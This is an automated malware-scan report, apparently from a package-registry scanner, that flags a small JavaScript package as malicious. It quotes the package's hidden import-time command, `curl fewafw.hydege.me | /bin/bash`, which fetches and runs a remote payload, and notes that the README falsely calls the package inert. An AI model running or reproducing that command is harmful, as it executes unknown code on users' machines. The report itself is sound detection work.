AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
- index.js imports child_process.exec.
- index.js executes on module import, without an exported-function call.
- It runs `curl fewafw.hydege.me | /bin/bash`, fetching and executing an unpinned remote payload.
Evidence against
- package.json has no lifecycle scripts or dependencies.
- README.md claims the package is inert, but that contradicts index.js.
Behavioral surface
Supply chainNo supply-chain packaging signals triggered.
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 531 B of source